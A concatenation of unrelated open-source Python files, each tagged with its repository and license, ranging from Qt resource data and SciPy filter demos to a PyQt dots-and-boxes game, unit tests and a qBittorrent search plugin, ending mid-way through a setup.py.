\xb9\xf4\xda\xfb\x91\x1f\x5b\x0d\x73\x36\x00\x83\x99\x83\x88\x30\
\x56\x90\x9d\xd9\xf3\xea\xd3\x48\xed\x2f\xa2\x16\xc9\x24\x8a\x8d\
\xaf\x62\x0d\xbb\x4b\xbe\x01\x78\x82\x39\xc4\xb6\x1b\x4f\xbb\x0d\
\x51\x8d\x00\xc1\x80\x79\x2e\x67\xb1\xe9\x52\xe7\xb8\x3a\x26\x00\
\x46\x60\x1e\xd1\x5b\x5b\x8e\x25\x7b\xab\x27\xd6\x72\x72\x71\xcb\
\x95\xc7\x27\x18\xe2\x20\x00\x9d\x86\x21\x04\xb8\xeb\x65\xcd\x81\
\xd6\xd5\x91\xc8\x74\x48\x5e\xf6\x82\x17\x0a\x18\xe2\xc4\x4c\x66\
\x6c\xac\x43\x18\xfc\x9b\x03\xa0\x24\x48\xe7\xf1\x5d\x03\x00\x06\
\x66\x2b\x4b\x40\x08\xc0\x24\x43\x36\x36\x77\xec\x04\x50\x3a\xee\
\x8e\x54\xaf\x21\x00\x44\x40\x6f\xef\xe9\x43\x3d\x29\x7b\xb2\x6c\
\x71\x6e\x9e\x02\x15\x53\x1a\x9f\x30\x20\x6c\xe2\xcf\x93\xf7\x26\
\x20\xb7\xdf\x0d\xa1\xaa\xa4\x30\x0e\x20\x3e\x1b\x29\x5f\x47\x07\
\x11\x69\xff\x90\x0c\xa9\x2a\x29\xc4\xaa\xb3\xb7\x0a\x1c\x61\xad\
\xa0\x09\x9f\xa7\x7c\x09\x79\x46\x7f\x5c\x94\x53\x34\xbc\xfd\xfa\
\xb3\xe9\x72\x8a\xf2\x97\xc7\x7c\xa0\x9a\x01\x35\xe3\x68\x00\xe9\
\x10\x5a\x07\x80\x53\x29\x7b\xd2\x7d\x72\x4f\x14\x40\x74\xae\xe6\
\x9b\x97\x63\xff\x3f\x08\x11\x31\x00\x08\x22\xb2\x3c\xad\xdd\xf9\
\x40\x94\x52\xb6\x14\xc4\x32\x53\x5a\x0f\xbf\xfb\xaa\x2e\xd4\x14\
\x37\xcc\x3c\x86\x74\xf3\xfd\x37\x67\x16\x82\x32\x7d\xa3\xeb\xb2\
\xdc\xc0\x3d\x59\x90\x93\x15\xfb\xe2\xd8\x57\x7f\xba\xce\x23\x06\
\x11\xd2\x7f\xbe\x49\x52\xc0\x41\x47\x76\x2d\xcc\xb0\xeb\xff\x00\
\x72\x5e\xce\xb1\x24\xf6\xb4\x1c\x00\x00\x00\x00\x49\x45\x4e\x44\
\xae\x42\x60\x82\
"
qt_resource_name = "\
\x00\x07\
\x07\x3b\xe0\xb3\
\x00\x70\
\x00\x6c\x00\x75\x00\x67\x00\x69\x00\x6e\x00\x73\
\x00\x0b\
\x03\xb1\x69\x82\
\x00\x74\
\x00\x61\x00\x73\x00\x6b\x00\x6d\x00\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\
\x00\x08\
\x0a\x61\x5a\xa7\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct = "\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x30\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| alexlopespereira/taskmanager | resources.py | Python | gpl-3.0 | 4,106 |
##! /usr/bin/env python
# _*_ coding: latin-1 _*_
# jtfilefilter
#
# Filefilter a jtdirlist és jtfilechooser osztályokhoz.
# Directorykhoz és normál filékhez külön filtert kell magadni.
#
# regexdir : 1 db reguláris kifejezés directorykra
# regexlist : reguláris kifejezések listája normál filékre
#
# regexlist az addregex és addpattern metódusokkal bõvíthetõ,
# utóbbi a filémaszkot megpróbálja reguláris kifejezésre alakítani
def jtfilepattern(x):
# Megjegyzés: a Jáva Pattern osztály ennél sokkal többet
# tud, ez itt csak emlékeztetõ a legegyszerûbb esetekre.
if x:
x=x.replace(".","\.")
x=x.replace("*",".*")
x=x.replace("?",".")
return x
class new:
def __init__(self):
self.description = ""
self.regexdir = None # regular exp for dirs
self.regexlist = [] # regular exps for files
def addregex(self,rx):
self.regexlist.append(rx)
return rx
def addpattern(self,p):
fp=jtfilepattern(p)
self.regexlist.append(fp)
return fp
def xmlout(self):
x="<filter>"
if self.description:
x+="<description>"+self.description+"</description>"
if self.regexdir:
x+="<dirmask>"+self.regexdir+"</dirmask>"
for e in self.regexlist:
x+="<mask>"+e+"</mask>"
x+="</filter>"
return x
| mrev11/ccc3 | jt/jtpython/jtlib/jtfilefilter.py | Python | lgpl-2.1 | 1,423 |
#example taken from scipy documentation
from scipy import signal
import matplotlib.pyplot as plt
import numpy as np
#disenar el filtro usando una ventana hamming
b = signal.firwin(9, 0.8, window='hamming', pass_zero=True)
#pasa bajas pass_zero=True
#pasa altas pass_zero=False
fs=1e3
t,T=np.linspace(1./fs,5,fs*5,retstep=True);
nFs=1/T;
F=10 #frecuencia fundamental 10 hz
w=2*np.pi*5 #frecuencia angular
Vm=4 #valor de amplitud de la onda
#generar onda compuesta de sinusoides
y=Vm*np.cos(w*t)+Vm/2*np.cos(2*w*t+np.deg2rad(45))+Vm/3*np.cos(3*w*t)+Vm/2*np.cos(4*w*t)
#generar onda de ruido sinusoidal, alta frecuencia y baja amplitud
x=2*np.cos(2*np.pi*370*t)
#onda con ruido
yx=y+x
#filtrar la onda con ruido usando el filtro FIR
yf=signal.lfilter(b, [1.0],yx)
plt.subplot(311)
plt.plot(t,y)
plt.title('onda sin ruido')
plt.subplot(312)
plt.plot(t,yx)
plt.title('onda con ruido')
plt.subplot(313)
plt.plot(t,yf)
plt.title('onda filtrada')
plt.xlabel('tiempo')
plt.show()
| miltonsarria/dsp-python | filters/FIR/filter_sine2.py | Python | mit | 1,015 |
from distutils.dir_util import copy_tree
from operator import itemgetter
import pandas as pd
import sys
from jinja2 import Environment, FileSystemLoader
import os
def generate_reports(folder):
hosts = []
# get all the paths of the root folder
files = [os.path.join(folder, fn) for fn in next(os.walk(folder))[2] if not fn.startswith(".")]
for logfile in files:
try:
data = pd.read_csv(logfile, delim_whitespace=True, comment='#', header=-1, index_col='timestamp',
parse_dates={'timestamp': [0, 1]})
print "reading data from " + logfile
except Exception, err:
print "duplicate index occured in " + logfile
print "There are two similar timestamps in the log." \
" To correct that error remove the duplicate entry from " + logfile
hostname = os.path.basename(logfile).replace('.tab', "")
host_data = {}
host_data['name'] = hostname
# CPU data
host_data['cpu_data'] = data.ix[:, 2].to_json(date_format='iso')
host_data['cpu_load'] = data.ix[:, 16].to_json(date_format='iso')
# Memorydata
host_data['mem_data'] = data.ix[:, 20].apply(lambda x: x / 1024000).to_json(date_format='iso')
# Disk data
host_data['disk_read'] = data.ix[:, 66].apply(lambda x: x / 1024).to_json(date_format='iso')
host_data['disk_write'] = data.ix[:, 67].apply(lambda x: x / 1024).to_json(date_format='iso')
# Network Data
host_data['net_rx'] = data.ix[:, 57].to_json(date_format='iso')
host_data['net_tx'] = data.ix[:, 58].to_json(date_format='iso')
hosts.append(host_data)
env = Environment(loader=FileSystemLoader('templates'))
env.add_extension("chartkick.ext.charts")
cpu_template = env.get_template('cpu_template.html')
memory_template = env.get_template('memory_template.html')
disk_template = env.get_template('disk_template.html')
network_template = env.get_template('network_template.html')
cpu_output = cpu_template.render(
hosts=sorted(hosts, key=itemgetter('name'), reverse=True),
)
memory_output = memory_template.render(
hosts=sorted(hosts, key=itemgetter('name'), reverse=True),
)
disk_output = disk_template.render(
hosts=sorted(hosts, key=itemgetter('name'), reverse=True),
)
network_output = network_template.render(
hosts=sorted(hosts, key=itemgetter('name'), reverse=True),
)
test_name = os.path.basename(folder)
test_name += "-report"
if not os.path.exists(test_name):
os.mkdir(test_name)
os.chdir(test_name)
# creating folder structure
if not os.path.exists('css'):
os.mkdir('css')
if not os.path.exists('js'):
os.mkdir('js')
if not os.path.exists('img'):
os.mkdir('img')
if not os.path.exists('fonts'):
os.mkdir('fonts')
copy_tree(os.path.abspath('../css'), 'css')
copy_tree(os.path.abspath('../js'), 'js')
copy_tree(os.path.abspath('../img'), 'img')
copy_tree(os.path.abspath('../fonts'), 'fonts')
with open('report_cpu.html', 'w') as f:
f.write(cpu_output)
with open('report_memory.html', 'w') as f:
f.write(memory_output)
with open('report_disk.html', 'w') as f:
f.write(disk_output)
with open('report_network.html', 'w') as f:
f.write(network_output)
def main(argv):
try:
folder = argv[1].strip()
generate_reports(folder)
print "########################################"
print "report generated successfully"
except Exception, err:
print err.message
print "should provide an input folder. ex : python plotter.py <input-folder>"
if __name__ == '__main__':
main(sys.argv)
| shelan/collectl-monitoring | plotter.py | Python | apache-2.0 | 3,847 |
#!/usr/bin/python
from PyQt4 import QtGui
from PyQt4 import QtCore
from ui_board import Ui_Form
from itertools import product
from waitingdialog import WaitingDialog
from exitdialog import ExitDialog
from Msgs import *
from cPickle import dumps, loads
class Board(QtGui.QMainWindow, Ui_Form):
vline_xposes = [116.0, 205.0, 294.0, 381.0, 477.0, 573.0]
vline_yposes = [133.0, 215.0, 294.0, 375.0, 462.0]
vline_poses = list(product(vline_xposes, vline_yposes))
hline_xposes = [132.0, 223.0, 308.0, 401.0, 494.0]
hline_yposes = [125.0, 204.0, 284.0, 363.0, 456.0, 534.0]
hline_poses = list(product(hline_xposes, hline_yposes))
mark_xposes = [160.0, 252.0, 344.0, 437.0, 529.0]
mark_yposes = [167.0, 247.0, 326.0, 406.0, 495.0]
mark_poses = list(product(mark_xposes, mark_yposes))
def __init__(self):
"""
"""
QtGui.QMainWindow.__init__(self)
self.line_map = dict()
self.lines = 60 * [False]
self.line_items = 60 * [None]
self.socket = None
self.n = 6
self.t = 0
self.turn = 'y'
self.score = {'y':0, 'o':0}
self.dline = None
self.dmark = None
self.avail = False
self.setupUi(self)
self.statusBar = QtGui.QStatusBar(self)
self.statusBar.setObjectName('statusBar')
self.setStatusBar(self.statusBar)
self.scene = DnbScene(0, 0, 700, 730)
self.scene.installEventFilter(self)
self.graphicsView.setScene(self.scene)
self.graphicsView.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.graphicsView.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.GraphicsSceneMouseDoubleClick and not self.avail:
print 'You can\'t play'
return True
else:
return QtGui.QMainWindow.eventFilter(self, obj, event)
def closeEvent(self, event):
"""
"""
#### TODO: exit game properly
dialog = ExitDialog()
if dialog.exec_():
event.accept()
else:
event.ignore()
def update_scoreboard(self):
"""
"""
pass
def add_line(self, line):
"""
"""
self.line_items[line][0].setZValue(3)
self.scene.removeItem(self.line_items[line][1])
self.lines[line] = True
#returns marks
marks = list()
if self.up_square(line):
marks.append(self.mark_number(line-self.n+1))
if self.down_square(line):
marks.append(self.mark_number(line+self.n))
if self.left_square(line):
marks.append(self.mark_number(line))
if self.right_square(line):
marks.append(self.mark_number(line+1))
return marks
def add_marks_y(self, marks):
"""
"""
# update score
for mark in marks:
x, y = Board.mark_poses[mark]
pitem = QtGui.QGraphicsPixmapItem()
pitem.setPos(x-15, y-15)
pitem.setPixmap(QtGui.QPixmap(":/board/y"))
pitem.setZValue(5)
self.scene.addItem(pitem)
self.score['y'] += len(marks)
def add_marks_o(self, marks):
"""
"""
# update score
for mark in marks:
x, y = Board.mark_poses[mark]
pitem = QtGui.QGraphicsPixmapItem()
pitem.setPos(x-15, y-15)
pitem.setPixmap(QtGui.QPixmap(":/board/o"))
pitem.setZValue(5)
self.scene.addItem(pitem)
def finish_game(self):
"""
"""
turnMsg = 'You Win' if self.score['y'] > self.score['o'] else 'You Lost'
scoreMsg = ('You: %d\tOpponent: %d\t\t' % (self.score['y'], self.score['o'])) + turnMsg
self.statusBar.showMessage(scoreMsg)
# close connection etc
QtGui.QMessageBox.information(self, 'Game Over', turnMsg)
exit(0)
# Signals
ui_ready = QtCore.pyqtSignal()
exit_game = QtCore.pyqtSignal()
# Slots
@QtCore.pyqtSlot()
def on_turn_recvd(self):
"""
"""
msg = loads(self.socket.readData(4096))
self.t += 1
print '------------------------ Turn #' + str(self.t) + ' Started ------------------------'
print 'Received turn message'
print ' ', 'Message:', msg
if msg:
# Valid message
line = msg['lines']
marks = msg['marks']
finished = msg['finished']
owner = msg['owner']
self.turn = msg['turn']
self.score = msg['score']
if owner != 'y':
if line != None:
print 'Lines to be added:', line
self.add_line(line)
if marks != [] and marks != None:
print 'Opponents marks:', marks
self.add_marks_o(marks)
self.update_scoreboard()
turnMsg = 'Your turn' if self.turn == 'y' else 'Opponent\'s turn'
scoreMsg = ('You: %d\tOpponent: %d\t\t' % (self.score['y'], self.score['o'])) + turnMsg
self.statusBar.showMessage(scoreMsg)
if finished:
self.finish_game()
elif self.turn == 'y':
self.avail = True
else:
self.avail = False
amsg = list()
amsg.append(TURN_RECVD)
smsg = dumps(amsg)
self.socket.writeData(smsg)
print '------------------------- Turn #' + str(self.t) + ' Ended -------------------------'
else:
# Opponent quit unexpectedly
QtGui.QMessageBox.critical(self, 'Game Over', 'Opponent has just quitted. Game over!', 'Exit Game')
exit(0)
@QtCore.pyqtSlot('QTcpSocket')
def after_create(self, sock):
"""
"""
self.init_board()
self.socket = sock
self.connect()
dialog = WaitingDialog(self)
self.socket.readyRead.connect(dialog.hide)
self.show()
self.ui_ready.emit()
dialog.show() # MODAL!!!
pass # Opponent join
self.show()
msg = dict()
msg['head'] = UIREADY
msg['body'] = None
msg = dumps(msg)
self.socket.writeData(msg)
self.socket.writeData('START')
QtCore.qDebug('GUI ready notification sent')
@QtCore.pyqtSlot('QTcpSocket')
def after_join(self, sock):
"""
"""
self.init_board()
self.socket = sock
self.connect()
self.show()
self.ui_ready.emit()
msg = dict()
msg['head'] = UIREADY
msg['body'] = None
msg = dumps(msg)
self.socket.writeData(msg)
self.socket.writeData('START')
QtCore.qDebug('GUI ready notification sent')
@QtCore.pyqtSlot('QPointF')
def on_line_add(self, point, b=False):
"""
"""
x, y = point.x(), point.y()
line = self.line_map[(x, y)]
if not self.lines[line]:
self.avail = False
marks = self.add_line(line)
print 'Your move adds line:', line
print 'Your marks:', marks
self.add_marks_y(marks) # update score
# send turn message
msg = dict()
msg['lines'] = line
msg['marks'] = marks
self.turn = msg['turn'] = 'y' if marks else 'o'
msg['score'] = self.score
turnMsg = 'Your turn' if self.turn == 'y' else 'Opponent\'s turn'
scoreMsg = ('You: %d\tOpponent: %d\t\t' % (self.score['y'], self.score['o'])) + turnMsg
self.statusBar.showMessage(scoreMsg)
print '------------------------- Turn #' + str(self.t) + ' Ended -------------------------'
smsg = [MOVE, msg]
smsg = dumps(smsg)
self.socket.writeData(smsg)
# Connections
def connect(self):
"""
"""
self.socket.readyRead.connect(self.on_turn_recvd)
self.scene.line_added.connect(self.on_line_add)
# Test functions
def is_horizontal(self, i):
"""
"""
return (i % (2*self.n-1)) < self.n-1
def is_vertical(self, i):
"""
"""
return not self.is_horizontal(i)
def right_border(self, i):
"""
"""
if self.is_horizontal(i):
return False
else:
return ((i+1) % (2*self.n-1)) == 0
def left_border(self, i):
"""
"""
return self.right_border(i+self.n-1)
def top_border(self, i):
"""
"""
return i >= 0 and i < self.n-1
def bottom_border(self, i):
"""
"""
return i > (2*self.n*(self.n-1))-self.n and i < 2*self.n*(self.n-1)
def up_square(self, i):
"""
"""
if self.top_border(i) or self.is_vertical(i):
return False
else:
return self.lines[i-self.n] and self.lines[i+1-self.n] and self.lines[i-(2*self.n-1)]
def down_square(self, i):
"""
"""
if self.bottom_border(i) or self.is_vertical(i):
return False
else:
return self.lines[i+self.n] and self.lines[i-1+self.n] and self.lines[i+(2*self.n-1)]
def left_square(self, i):
"""
"""
if self.left_border(i) or self.is_horizontal(i):
return False
else:
return self.lines[i-self.n] and self.lines[i-1] and self.lines[i+self.n-1]
def right_square(self, i):
"""
"""
if self.right_border(i) or self.is_horizontal(i):
return False
else:
return self.lines[i+self.n] and self.lines[i+1-self.n] and self.lines[i+1]
def mark_number(self, r):
c = 2*self.n-1
a = r/c
b = (r-self.n) % c
return a + b*(self.n-1)
def init_board(self):
"""
"""
# Set background
bgItem = QtGui.QGraphicsPixmapItem()
bg = QtGui.QPixmap(":/board/bg")
bgItem.setPixmap(bg)
bgItem.setZValue(2)
self.scene.addItem(bgItem)
# Add horiontal lines and selection region as invisible
i = 0
j = 0
for line_pos in Board.hline_poses:
line_item = HLineItem(line_pos)
line_item.setZValue(1)
self.scene.addItem(line_item)
self.line_map[line_pos] = j
x, y = line_pos
rect = HRectItem(x+5, y-5)
rect.setZValue(0)
self.scene.addItem(rect)
self.line_items[j] = (line_item, rect)
if j >= 55:
i += 1
j = i
else:
j += 11
# Add vertical lines and selection region as invisible
i = 5
j = 5
for line_pos in Board.vline_poses:
line_item = VLineItem(line_pos)
line_item.setZValue(1)
self.scene.addItem(line_item)
self.line_map[line_pos] = j
x, y = line_pos
rect = VRectItem(x-5, y+5)
rect.setZValue(0)
self.scene.addItem(rect)
self.line_items[j] = (line_item, rect)
if j >= 49:
i += 1
j = i
else:
j += 11
class DnbScene(QtGui.QGraphicsScene):
def __init__(self, *args):
"""
"""
super(DnbScene, self).__init__(*args)
def addItem(self, item):
"""
"""
if isinstance(item, RectItem):
item.obj.drawn.connect(self.remove_rect)
item.obj.line_added.connect(self.line_added_slot)
super(DnbScene, self).addItem(item)
# Signals
line_added = QtCore.pyqtSignal('QPointF', bool)
# Slots
@QtCore.pyqtSlot('QPointF')
def line_added_slot(self, p):
self.line_added.emit(p, True)
@QtCore.pyqtSlot('QGraphicsPixmapItem')
def remove_rect(self, ritem):
"""
"""
pass #self.removeItem(ritem)
class RectObj(QtCore.QObject):
def __init__(self):
super(RectObj, self).__init__()
def emit(self, pixmap, point):
self.drawn.emit(pixmap)
self.line_added.emit(point)
# Signal
drawn = QtCore.pyqtSignal('QGraphicsPixmapItem')
line_added = QtCore.pyqtSignal('QPointF')
class RectItem(QtGui.QGraphicsPixmapItem):
def __init__(self, x, y):
super(RectItem, self).__init__()
self.obj = RectObj()
self.setPos(x, y)
def mouseDoubleClickEvent(self, event):
items = self.collidingItems()
hline = items[1]
hline.setZValue(3)
self.obj.emit(self, hline.pos())
class VRectItem(RectItem):
def __init__(self, x, y):
super(VRectItem, self).__init__(x, y)
self.setPixmap(QtGui.QPixmap(':/board/vrect'))
class HRectItem(RectItem):
def __init__(self, x, y):
super(HRectItem, self).__init__(x, y)
self.setPixmap(QtGui.QPixmap(':/board/hrect'))
class LineItem(QtGui.QGraphicsPixmapItem):
def __init__(self, pos):
"""
"""
super(LineItem, self).__init__()
self.setPos(pos[0], pos[1])
class HLineItem(LineItem):
def __init__(self, pos):
"""
"""
super(HLineItem, self).__init__(pos)
self.setPixmap(QtGui.QPixmap(":/board/hline"))
class VLineItem(LineItem):
def __init__(self, pos):
"""
"""
super(VLineItem, self).__init__(pos)
self.setPixmap(QtGui.QPixmap(":/board/vline"))
| dirtybit/pyDnb | ui/board.py | Python | gpl-2.0 | 13,881 |
#!/usr/bin/env python2.7
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
''' Sample usage of function 'inventory_not_connected' to show which devices are mounted, but not connected.
Print the function's documentation then invoke the function and print the output.
'''
from __future__ import print_function as _print_function
from basics.inventory import inventory_not_connected
from basics.render import print_table
from pydoc import render_doc as doc
from pydoc import plain
def main():
print(plain(doc(inventory_not_connected)))
print("inventory_not_connected()")
print_table(inventory_not_connected(), headers='device-name')
if __name__ == "__main__":
main() | tbarrongh/cosc-learning-labs | src/learning_lab/01_inventory_not_connected.py | Python | apache-2.0 | 1,219 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = "Karolina Alexiou"
__email__ = "[email protected]"
import platform
import os
LINUX = "linux"
MACOS = "macos"
WINDOWS = "windows"
# TODO have people confirm the prefix path for Mac
# TODO Make it possible to test against a list of paths
# (Qt + unittest has some issues when looping over paths and re-initializing, unfortunately)
os_prefix_paths = {LINUX: "/usr", MACOS: "/Applications/QGIS.app/Contents",
WINDOWS: "C:/PROGRA~1/QGISBR~1/apps/qgis"}
def get_os(): # pragma: no cover
"""Determine OS"""
# details of platform implementation
# https://hg.python.org/cpython/file/2.7/Lib/platform.py#l1568
if "linux" in platform.platform().lower():
return LINUX
elif "macos" in platform.platform().lower() or "darwin" in platform.platform().lower():
return MACOS
elif "windows" in platform.platform().lower():
return WINDOWS
else:
raise Exception("OS not found")
def get_possible_prefix_path(): # pragma: no cover
# ideally the dev environment has set a "QGIS_PREFIX_PATH"
if os.getenv("QGIS_PREFIX_PATH", None) is not None:
return os.getenv("QGIS_PREFIX_PATH")
elif os.getenv("PREFIX_PATH", None) is not None:
return os.getenv("PREFIX_PATH")
else: # raw guessing
return os_prefix_paths[get_os()]
| anitagraser/TimeManager | utils/os_util.py | Python | gpl-2.0 | 1,389 |
import unittest
import atomic
import numpy as np
class TestRadiation(unittest.TestCase):
def setUp(self):
ad1 = atomic.element('carbon')
ad2 = atomic.element('li')
eq1 = atomic.CollRadEquilibrium(ad1)
eq2 = atomic.CollRadEquilibrium(ad2)
te = np.logspace(0, 3, 50)
ne = 1e19
self.y1 = eq1.ionisation_stage_distribution(te, ne)
self.y2 = eq2.ionisation_stage_distribution(te, ne)
# The tests of get_impurity_density and get_neutral_density could
# be rewritten more as unit tests, by mocking up a y.
def test_get_impurity_density_finite(self):
rad = atomic.Radiation(self.y1, impurity_fraction=0.1)
expected = 1e18
result = rad.get_impurity_density()
self.assertEqual(expected, result)
def test_get_impurity_density_finite2(self):
"""There are 10 times as many impurities as main ions."""
rad = atomic.Radiation(self.y1, impurity_fraction=10)
expected = 1e20
result = rad.get_impurity_density()
self.assertEqual(expected, result)
def test_get_impurity_density_default_1(self):
rad = atomic.Radiation(self.y1)
expected = 1e19
result = rad.get_impurity_density()
self.assertEqual(expected, result)
def test_get_impurity_density_zero(self):
rad = atomic.Radiation(self.y1, impurity_fraction=0)
expected = 0
result = rad.get_impurity_density()
self.assertEqual(expected, result)
def test_get_neutral_density(self):
rad = atomic.Radiation(self.y1, neutral_fraction=1e-2)
expected = 1e17
result = rad.get_neutral_density()
self.assertEqual(expected, result)
def test_get_neutral_density_default_zero(self):
rad = atomic.Radiation(self.y1)
expected = 0.
result = rad.get_neutral_density()
self.assertEqual(expected, result)
@unittest.skip("")
def test_power(self):
rad = atomic.Radiation(self.y1)
power = rad.power
@unittest.skip("")
def test_specific_power(self):
# radiation = Radiation(ionisation_stage_distribution, impurity_fraction, neutral_fraction)
# self.assertEqual(expected, radiation.specific_power())
assert False # TODO: implement your test here
if __name__ == '__main__':
unittest.main()
| ezekial4/atomic_neu | atomic/tests/test_radiation.py | Python | mit | 2,367 |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
PCI functionality.
"""
from . import device
class PciBus(device.Driver):
driver = "pci-bus"
def create(self, **kwargs):
return super(PciBus, self).create(
cmdline="pci=conf1",
**kwargs)
class PciHostBridge(device.Driver):
# NOTE: For now, PCI support is pretty sketchy.
# Generally, we'll need to have a hostbridge appear
# in the list of devices.
# For information on the bridge that might normally
# appear, see src/novmm/machine/pcihost.go.
driver = "pci-hostbridge"
device.Driver.register(PciBus)
device.Driver.register(PciHostBridge)
| nathanaelle/novm | novm/pci.py | Python | apache-2.0 | 1,210 |
#VERSION: 1.60
#AUTHORS: Diego de las Heras ([email protected])
# Christophe Dumez ([email protected])
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
try:
#python3
from html.parser import HTMLParser
from urllib.parse import quote, urlencode
import http.client as httplib
except ImportError:
#python2
from HTMLParser import HTMLParser
from urllib import quote, urlencode
import httplib
#qBt
from novaprinter import prettyPrinter
from helpers import retrieve_url, download_file
class sumotorrent(object):
url = 'http://www.sumotorrent.sx'
name = 'SumoTorrent'
supported_categories = {'all': '', 'movies': '4', 'tv': '9', 'music': '0', 'games': '2', 'anime': '8', 'software': '1'}
trackers_list = ['udp://tracker.coppersurfer.tk:6969/announce',
'udp://tracker.open-internet.nl:6969/announce',
'udp://exodus.desync.com:6969/announce',
'udp://tracker.internetwarriors.net:1337/announce',
'udp://9.rarbg.com:2710/announce',
'udp://tracker.opentrackr.org:1337/announce']
trackers = '&' + '&'.join(urlencode({'tr' : tracker}) for tracker in trackers_list)
def download_torrent(self, download_link):
# we need to follow the redirect to get the magnet link
conn = httplib.HTTPConnection(self.url[7:])
conn.request("GET", download_link.replace(self.url, ''))
response = conn.getresponse()
if response.status == 302:
redirection_target = response.getheader('Location')
print(redirection_target + self.trackers + " " + download_link)
else:
raise Exception('Error, please fill a bug report!')
class MyHtmlParser(HTMLParser):
def __init__(self, results, url, *args):
HTMLParser.__init__(self)
self.url = url
self.td_counter = None
self.current_item = None
self.results = results
def handle_starttag(self, tag, attrs):
params = dict(attrs)
if tag == 'a' and 'href' in params:
if 'en/details/' in params['href'] and (self.td_counter is None or self.td_counter > 5):
self.current_item = {}
self.td_counter = 0
self.current_item['desc_link'] = params['href']
elif params['href'].startswith('http://torrents.sumotorrent.sx/download/'):
parts = params['href'].strip().split('/')
self.current_item['link'] = self.url + '/torrent_download/'+parts[-3]+'/'+parts[-2]+'/'+quote(parts[-1]).replace('%20', '+')
elif tag == 'td' and isinstance(self.td_counter,int):
self.td_counter += 1
if self.td_counter > 6:
# Display item
self.td_counter = None
self.current_item['engine_url'] = self.url
if not self.current_item['seeds'].isdigit():
self.current_item['seeds'] = 0
if not self.current_item['leech'].isdigit():
self.current_item['leech'] = 0
self.current_item['name'] = self.current_item['name'].strip()
try: #python2
self.current_item['name'] = self.current_item['name'].decode('utf8')
except:
pass
prettyPrinter(self.current_item)
self.results.append('a')
def handle_data(self, data):
if self.td_counter == 0:
if 'name' not in self.current_item:
self.current_item['name'] = ''
self.current_item['name'] += data
elif self.td_counter == 3:
if 'size' not in self.current_item:
self.current_item['size'] = ''
self.current_item['size'] += data.strip()
elif self.td_counter == 4:
if 'seeds' not in self.current_item:
self.current_item['seeds'] = ''
self.current_item['seeds'] += data.strip()
elif self.td_counter == 5:
if 'leech' not in self.current_item:
self.current_item['leech'] = ''
self.current_item['leech'] += data.strip()
def search(self, what, cat='all'):
results_list = []
parser = self.MyHtmlParser(results_list, self.url)
i = 0
while i < 6:
dat = retrieve_url(self.url+'/searchResult.php?search=%s&lngMainCat=%s&order=seeders&by=down&start=%d'%(what, self.supported_categories[cat], i))
parser.feed(dat)
if len(results_list) < 1:
break
del results_list[:]
i += 1
parser.close()
| ngosang/qBittorrent-plugins | sumotorrent/sumotorrent.py | Python | gpl-2.0 | 6,341 |
from setuptools import setup, find_packages
XMODULES = [
"abtest = xmodule.abtest_module:ABTestDescriptor",
"book = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"chapter = xmodule.seq_module:SequenceDescriptor",
"combinedopenended = xmodule.combined_open_ended_module:CombinedOpenEndedDescriptor",
"conditional = xmodule.conditional_module:ConditionalDescriptor",
"course = xmodule.course_module:CourseDescriptor",
"customtag = xmodule.template_module:CustomTagDescriptor",
"discuss = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"html = xmodule.html_module:HtmlDescriptor",
